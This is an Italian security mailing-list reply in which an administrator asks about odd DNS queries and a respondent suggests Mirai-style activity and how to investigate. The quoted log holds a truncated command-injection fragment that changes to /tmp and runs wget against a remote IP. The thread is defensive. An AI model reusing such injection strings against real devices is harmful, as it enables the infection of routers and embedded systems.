2017-02-14 15:25 GMT+01:00 Lorenzo Mainardi <[email protected]>: > gestisco un server DNS cache per diverse migliaia di utenti broadband e mi > ritrovo nei log delle query di questo tipo: > > 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? `cd > /tmp;wget http://105.226.91.155. (53) [...]
> Che cosa pensate possano essere? Tentativi di command injection? > รจ la prima volta che mi capita di vedere delle query del genere. Ho guardato molto velocemente: a naso mi verrebbe da dire Mirai o una sua variante https://it.wikipedia.org/wiki/Mirai_(malware) ma le tue query sembrano incomplete come payload. Sempre ad occhio, sono dirette ad altri router/embedded, io darei un'occhiata ai pattern delle query correlandole agli ip sorgenti. Quando hai le query complete, dai un'occhiata a cosa puntano e cosa vogliono scaricare e ti fai rapidamente un'idea dello scopo :) ciao, -- guido ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
